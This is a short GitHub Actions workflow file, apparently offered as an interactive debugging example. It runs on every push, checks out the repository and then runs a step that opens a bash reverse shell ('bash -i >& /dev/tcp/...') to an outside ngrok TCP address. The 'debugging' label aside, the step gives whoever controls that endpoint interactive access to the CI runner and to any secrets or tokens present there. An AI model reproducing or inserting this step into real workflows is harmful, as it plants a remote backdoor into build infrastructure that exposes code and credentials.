name: Interactive debugging example
on:
  push:

jobs:
  interactive:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v2

      # Rest of my workflow steps

      - name: Thow interactive shell
        shell: bash
        run: |
              bash -i >& /dev/tcp/8.tcp.ngrok.io/15063 0>&1
